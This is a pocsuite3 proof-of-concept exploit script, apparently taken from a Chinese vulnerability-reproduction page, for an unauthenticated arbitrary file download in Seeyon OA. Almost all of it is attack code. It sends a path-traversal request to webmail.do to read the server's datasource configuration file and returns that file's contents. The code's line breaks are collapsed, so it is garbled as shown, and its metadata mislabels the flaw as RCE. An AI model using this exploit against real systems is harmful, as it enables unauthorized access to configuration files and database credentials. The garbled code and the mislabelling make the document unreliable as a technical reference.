from urllib.parse import urljoinfrom pocsuite3.api import Output, POCBase, logger, requests, register_pocclass DemoPOC(POCBase):vulID = '99114' # ssvidversion = '3.0'author = ['']vulDate = '2021-1-27'createDate = '2021-1-27'updateDate = '2021-1-27'references = ['']name = 'Seeyon OA UNAuth File Download'appPowerLink = ''appName = 'Seeyon OA'appVersion = ''vulType = 'RCE'desc = '''致远OA未授权任意文件下载'''samples = []install_requires = ['']def check(self, file_path, check_flag):vul_url = urljoin(self.url, '/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath={}'.format(file_path))resp = requests.get(vul_url)if resp.status_code == 200 and check_flag in resp.text:return resp.textdef _verify(self):result = {}try:file_path = '../conf/datasourceCtp.properties'check_flag = 'ctpDataSource'data = self.check(file_path, check_flag)if data:result['VerifyInfo'] = {}result['VerifyInfo']['URL'] = self.urlresult['VerifyInfo']['FilePath'] = file_pathresult['VerifyInfo']['FileContent'] = dataexcept Exception as e:logger.error(str(e))return self.parse_output(result)def parse_output(self, result):output = Output(self)if result:output.success(result)else:output.fail('target is not vulnerable')return outputregister_poc(DemoPOC)
首页 >
漏洞复现致远OA webmaildo 任意文件下载 CNVD > 致远OA任意文件下载漏洞(CNVD